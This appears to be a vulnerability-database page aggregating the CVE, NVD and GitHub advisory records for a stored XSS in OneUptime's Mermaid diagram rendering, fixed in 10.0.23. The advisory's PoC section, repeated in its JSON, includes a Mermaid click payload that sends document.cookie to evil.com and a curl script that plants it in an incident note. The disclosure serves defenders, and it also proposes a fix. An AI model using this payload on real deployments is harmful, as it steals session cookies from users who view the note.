Vulnerability-Lookup

CVE-2026-32308 (GCVE-0-2026-32308)

Vulnerability from cvelistv5 – Published: 2026-03-12 21:29 – Updated: 2026-03-14 03:43

Title

OneUptime: Stored XSS via Mermaid Diagram Rendering (securityLevel: "loose")

Summary

OneUptime is a solution for monitoring and managing online services. Prior to 10.0.23, the Markdown viewer component renders Mermaid diagrams with securityLevel: "loose" and injects the SVG output via innerHTML. This configuration explicitly allows interactive event bindings in Mermaid diagrams, enabling XSS through Mermaid's click directive which can execute arbitrary JavaScript. Any field that renders markdown (incident descriptions, status page announcements, monitor notes) is vulnerable. This vulnerability is fixed in 10.0.23.

Severity ?

7.6 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Assigner

GitHub_M

References

URL

Tags

https://github.com/OneUptime/oneuptime/security/a…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	OneUptime	oneuptime	Affected: < 10.0.23

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-32308",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-14T03:42:52.550994Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-14T03:43:13.858Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "oneuptime",
          "vendor": "OneUptime",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 10.0.23"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "OneUptime is a solution for monitoring and managing online services. Prior to 10.0.23, the Markdown viewer component renders Mermaid diagrams with securityLevel: \"loose\" and injects the SVG output via innerHTML. This configuration explicitly allows interactive event bindings in Mermaid diagrams, enabling XSS through Mermaid\u0027s click directive which can execute arbitrary JavaScript. Any field that renders markdown (incident descriptions, status page announcements, monitor notes) is vulnerable. This vulnerability is fixed in 10.0.23."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.6,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-12T21:29:00.510Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-wvh5-6vjm-23qh",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-wvh5-6vjm-23qh"
        }
      ],
      "source": {
        "advisory": "GHSA-wvh5-6vjm-23qh",
        "discovery": "UNKNOWN"
      },
      "title": "OneUptime: Stored XSS via Mermaid Diagram Rendering (securityLevel: \"loose\")"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-32308",
    "datePublished": "2026-03-12T21:29:00.510Z",
    "dateReserved": "2026-03-11T21:16:21.659Z",
    "dateUpdated": "2026-03-14T03:43:13.858Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-32308\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-13T19:54:42.147\",\"lastModified\":\"2026-03-16T14:54:11.293\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"OneUptime is a solution for monitoring and managing online services. Prior to 10.0.23, the Markdown viewer component renders Mermaid diagrams with securityLevel: \\\"loose\\\" and injects the SVG output via innerHTML. This configuration explicitly allows interactive event bindings in Mermaid diagrams, enabling XSS through Mermaid\u0027s click directive which can execute arbitrary JavaScript. Any field that renders markdown (incident descriptions, status page announcements, monitor notes) is vulnerable. This vulnerability is fixed in 10.0.23.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N\",\"baseScore\":7.6,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.3,\"impactScore\":4.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"references\":[{\"url\":\"https://github.com/OneUptime/oneuptime/security/advisories/GHSA-wvh5-6vjm-23qh\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-32308\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-14T03:42:52.550994Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-14T03:43:09.143Z\"}}], \"cna\": {\"title\": \"OneUptime: Stored XSS via Mermaid Diagram Rendering (securityLevel: \\\"loose\\\")\", \"source\": {\"advisory\": \"GHSA-wvh5-6vjm-23qh\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 7.6, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"OneUptime\", \"product\": \"oneuptime\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 10.0.23\"}]}], \"references\": [{\"url\": \"https://github.com/OneUptime/oneuptime/security/advisories/GHSA-wvh5-6vjm-23qh\", \"name\": \"https://github.com/OneUptime/oneuptime/security/advisories/GHSA-wvh5-6vjm-23qh\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"OneUptime is a solution for monitoring and managing online services. Prior to 10.0.23, the Markdown viewer component renders Mermaid diagrams with securityLevel: \\\"loose\\\" and injects the SVG output via innerHTML. This configuration explicitly allows interactive event bindings in Mermaid diagrams, enabling XSS through Mermaid\u0027s click directive which can execute arbitrary JavaScript. Any field that renders markdown (incident descriptions, status page announcements, monitor notes) is vulnerable. This vulnerability is fixed in 10.0.23.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-12T21:29:00.510Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-32308\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-14T03:43:13.858Z\", \"dateReserved\": \"2026-03-11T21:16:21.659Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-12T21:29:00.510Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-32308

Vulnerability from fkie_nvd - Published: 2026-03-13 19:54 - Updated: 2026-03-16 14:54

Severity ?

7.6 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/OneUptime/oneuptime/security/advisories/GHSA-wvh5-6vjm-23qh

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "OneUptime is a solution for monitoring and managing online services. Prior to 10.0.23, the Markdown viewer component renders Mermaid diagrams with securityLevel: \"loose\" and injects the SVG output via innerHTML. This configuration explicitly allows interactive event bindings in Mermaid diagrams, enabling XSS through Mermaid\u0027s click directive which can execute arbitrary JavaScript. Any field that renders markdown (incident descriptions, status page announcements, monitor notes) is vulnerable. This vulnerability is fixed in 10.0.23."
    }
  ],
  "id": "CVE-2026-32308",
  "lastModified": "2026-03-16T14:54:11.293",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.6,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 4.7,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-13T19:54:42.147",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-wvh5-6vjm-23qh"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Undergoing Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-WVH5-6VJM-23QH

Vulnerability from github – Published: 2026-03-13 20:00 – Updated: 2026-03-16 17:06

Summary

OneUptime: Stored XSS via Mermaid Diagram Rendering (securityLevel: "loose")

Details

Summary

The Markdown viewer component renders Mermaid diagrams with securityLevel: "loose" and injects the SVG output via innerHTML. This configuration explicitly allows interactive event bindings in Mermaid diagrams, enabling XSS through Mermaid's click directive which can execute arbitrary JavaScript. Any field that renders markdown (incident descriptions, status page announcements, monitor notes) is vulnerable.

Details

Mermaid configuration — Common/UI/Components/Markdown.tsx/MarkdownViewer.tsx:76:

// MarkdownViewer.tsx:76
mermaid.initialize({
    securityLevel: "loose",  // Allows interactive event bindings
    // ...
});

The Mermaid documentation explicitly warns: securityLevel: "loose" allows click events and other interactive bindings in diagrams. The safe default is "strict" which strips all interactivity.

SVG injection via innerHTML — MarkdownViewer.tsx:106:

// MarkdownViewer.tsx:106
if (containerRef.current) {
    containerRef.current.innerHTML = svg;  // Raw SVG injection
}

After Mermaid renders the diagram to SVG, the SVG string is injected directly into the DOM via innerHTML. Combined with securityLevel: "loose", this allows event handlers embedded in the SVG to execute.

Mermaid XSS payload:

```mermaid
graph TD
    A["Click me"]
    click A callback "javascript:fetch('https://evil.com/?c='+document.cookie)"
```

With securityLevel: "loose", Mermaid processes the click directive and creates an SVG element with an event handler that executes the JavaScript.

PoC

# Authenticate
TOKEN=$(curl -s -X POST 'https://TARGET/identity/login' \
  -H 'Content-Type: application/json' \
  -d '{"email":"user@example.com","password":"password123"}' \
  | jq -r '.token')

# Create an incident note with Mermaid XSS payload
curl -s -X POST 'https://TARGET/api/incident-note' \
  -H "Authorization: Bearer $TOKEN" \
  -H 'Content-Type: application/json' \
  -H 'tenantid: PROJECT_ID' \
  -d '{
    "data": {
      "incidentId": "INCIDENT_ID",
      "note": "## Root Cause Analysis\n\n```mermaid\ngraph TD\n    A[\"Load Balancer\"] --> B[\"App Server\"]\n    click A callback \"javascript:fetch('"'"'https://evil.com/?c='"'"'+document.cookie)\"\n```",
      "noteType": "RootCause"
    }
  }'

# Any user viewing this incident note will have their cookies exfiltrated

# Verify the vulnerability in source code:

# 1. securityLevel: "loose":
grep -n 'securityLevel' Common/UI/Components/Markdown.tsx/MarkdownViewer.tsx
# Line 76: securityLevel: "loose"

# 2. innerHTML injection:
grep -n 'innerHTML' Common/UI/Components/Markdown.tsx/MarkdownViewer.tsx
# Line 106: containerRef.current.innerHTML = svg

Impact

Stored XSS in any markdown-rendered field. Affects:

Incident notes/descriptions — viewed by on-call engineers during incidents
Status page announcements — viewed by public visitors
Monitor descriptions — viewed by team members
Any markdown field — the MarkdownViewer component is shared across the UI

The "loose" security level combined with innerHTML injection allows arbitrary JavaScript execution in the context of the OneUptime application.

Proposed Fix

// 1. Change securityLevel to "strict" (default safe mode):
mermaid.initialize({
    securityLevel: "strict",  // Strips all interactive bindings
    // ...
});

// 2. Use DOMPurify on the SVG output before innerHTML injection:
import DOMPurify from "dompurify";

if (containerRef.current) {
    containerRef.current.innerHTML = DOMPurify.sanitize(svg, {
        USE_PROFILES: { svg: true, svgFilters: true },
        ADD_TAGS: ['foreignObject'],
    });
}

Severity ?

7.6 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "oneuptime"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "10.0.23"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32308"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T20:00:38Z",
    "nvd_published_at": "2026-03-13T19:54:42Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe Markdown viewer component renders Mermaid diagrams with `securityLevel: \"loose\"` and injects the SVG output via `innerHTML`. This configuration explicitly allows interactive event bindings in Mermaid diagrams, enabling XSS through Mermaid\u0027s `click` directive which can execute arbitrary JavaScript. Any field that renders markdown (incident descriptions, status page announcements, monitor notes) is vulnerable.\n\n### Details\n\n**Mermaid configuration \u2014 `Common/UI/Components/Markdown.tsx/MarkdownViewer.tsx:76`:**\n\n```typescript\n// MarkdownViewer.tsx:76\nmermaid.initialize({\n    securityLevel: \"loose\",  // Allows interactive event bindings\n    // ...\n});\n```\n\nThe Mermaid documentation explicitly warns: `securityLevel: \"loose\"` allows click events and other interactive bindings in diagrams. The safe default is `\"strict\"` which strips all interactivity.\n\n**SVG injection via innerHTML \u2014 `MarkdownViewer.tsx:106`:**\n\n```typescript\n// MarkdownViewer.tsx:106\nif (containerRef.current) {\n    containerRef.current.innerHTML = svg;  // Raw SVG injection\n}\n```\n\nAfter Mermaid renders the diagram to SVG, the SVG string is injected directly into the DOM via `innerHTML`. Combined with `securityLevel: \"loose\"`, this allows event handlers embedded in the SVG to execute.\n\n**Mermaid XSS payload:**\n\n```markdown\n```mermaid\ngraph TD\n    A[\"Click me\"]\n    click A callback \"javascript:fetch(\u0027https://evil.com/?c=\u0027+document.cookie)\"\n```\u200b\n```\n\nWith `securityLevel: \"loose\"`, Mermaid processes the `click` directive and creates an SVG element with an event handler that executes the JavaScript.\n\n### PoC\n\n```bash\n# Authenticate\nTOKEN=$(curl -s -X POST \u0027https://TARGET/identity/login\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"email\":\"user@example.com\",\"password\":\"password123\"}\u0027 \\\n  | jq -r \u0027.token\u0027)\n\n# Create an incident note with Mermaid XSS payload\ncurl -s -X POST \u0027https://TARGET/api/incident-note\u0027 \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -H \u0027tenantid: PROJECT_ID\u0027 \\\n  -d \u0027{\n    \"data\": {\n      \"incidentId\": \"INCIDENT_ID\",\n      \"note\": \"## Root Cause Analysis\\n\\n```mermaid\\ngraph TD\\n    A[\\\"Load Balancer\\\"] --\u003e B[\\\"App Server\\\"]\\n    click A callback \\\"javascript:fetch(\u0027\"\u0027\"\u0027https://evil.com/?c=\u0027\"\u0027\"\u0027+document.cookie)\\\"\\n```\",\n      \"noteType\": \"RootCause\"\n    }\n  }\u0027\n\n# Any user viewing this incident note will have their cookies exfiltrated\n```\n\n```bash\n# Verify the vulnerability in source code:\n\n# 1. securityLevel: \"loose\":\ngrep -n \u0027securityLevel\u0027 Common/UI/Components/Markdown.tsx/MarkdownViewer.tsx\n# Line 76: securityLevel: \"loose\"\n\n# 2. innerHTML injection:\ngrep -n \u0027innerHTML\u0027 Common/UI/Components/Markdown.tsx/MarkdownViewer.tsx\n# Line 106: containerRef.current.innerHTML = svg\n```\n\n### Impact\n\n**Stored XSS in any markdown-rendered field.** Affects:\n\n1. **Incident notes/descriptions** \u2014 viewed by on-call engineers during incidents\n2. **Status page announcements** \u2014 viewed by public visitors\n3. **Monitor descriptions** \u2014 viewed by team members\n4. **Any markdown field** \u2014 the MarkdownViewer component is shared across the UI\n\nThe \"loose\" security level combined with `innerHTML` injection allows arbitrary JavaScript execution in the context of the OneUptime application.\n\n### Proposed Fix\n\n```typescript\n// 1. Change securityLevel to \"strict\" (default safe mode):\nmermaid.initialize({\n    securityLevel: \"strict\",  // Strips all interactive bindings\n    // ...\n});\n\n// 2. Use DOMPurify on the SVG output before innerHTML injection:\nimport DOMPurify from \"dompurify\";\n\nif (containerRef.current) {\n    containerRef.current.innerHTML = DOMPurify.sanitize(svg, {\n        USE_PROFILES: { svg: true, svgFilters: true },\n        ADD_TAGS: [\u0027foreignObject\u0027],\n    });\n}\n```",
  "id": "GHSA-wvh5-6vjm-23qh",
  "modified": "2026-03-16T17:06:49Z",
  "published": "2026-03-13T20:00:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-wvh5-6vjm-23qh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32308"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OneUptime/oneuptime"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/releases/tag/10.0.23"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OneUptime: Stored XSS via Mermaid Diagram Rendering (securityLevel: \"loose\")"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-32308 (GCVE-0-2026-32308)

FKIE_CVE-2026-32308

GHSA-WVH5-6VJM-23QH

Summary

Details

PoC

Impact

Proposed Fix

Tags

Sightings

Nomenclature